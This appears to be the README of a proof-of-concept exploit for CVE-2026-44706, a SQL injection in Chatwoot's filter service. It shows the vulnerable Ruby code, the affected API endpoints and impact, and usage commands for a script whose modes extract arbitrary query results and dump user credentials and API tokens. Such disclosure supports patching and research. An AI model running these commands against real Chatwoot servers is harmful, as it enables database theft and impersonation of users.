A proof-of-concept exploit for CVE-2026-44706, a SQL Injection vulnerability in Chatwoot's FilterService#lt_gt_filter_values that allows any authenticated agent to read the entire PostgreSQL database including user credentials and API tokens. Read the full article here.
Usage:
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds- Chatwoot ≤ 4.11.1
In app/services/filter_service.rb (line 91), user input is interpolated directly into SQL without parameterization:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← user input, no sanitization
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation
endEvery other operator in the class uses bind parameters (:value_N). Only is_greater_than and is_less_than are vulnerable.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filter
CWE-89 SQL Injection. Any authenticated agent/admin can:
- Read the entire database users, messages, tokens, cross-account data
- Steal credentials bcrypt hashes for offline cracking
- Steal API tokens impersonate any user including SuperAdmins
- DoS
pg_sleep()to exhaust database connections
8.8 High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
This tool is for educational and research purposes only. Use it only on systems you own or have explicit permission to test. The author is not responsible for any misuse or damage caused by this program.
QuimeraX Intelligence is an advanced EASM and Cyber Threat Intelligence platform specializing in identifying critical vulnerabilities in complex systems. The platform proactively monitors, detects, and alerts clients about security threats, ensuring transparency and rapid response to potential risks. Clients receive immediate notifications and comprehensive reports if their systems are found vulnerable, enabling them to take protective action. learn more
Hakai Security is a cybersecurity company founded by security professionals, committed to technical excellence. We offer tailored security solutions including advanced penetration testing, realistic Red Team simulations, and secure development practices to proactively protect our clients' assets from evolving cyber threats.
Hacking Club is the training platform where you learn cybersecurity through hands-on lessons, labs, and challenges created by experts working in our security consulting firm: straight from the battlefield to your training. Practice the vulnerability presented in this repository by the hacking club! learn more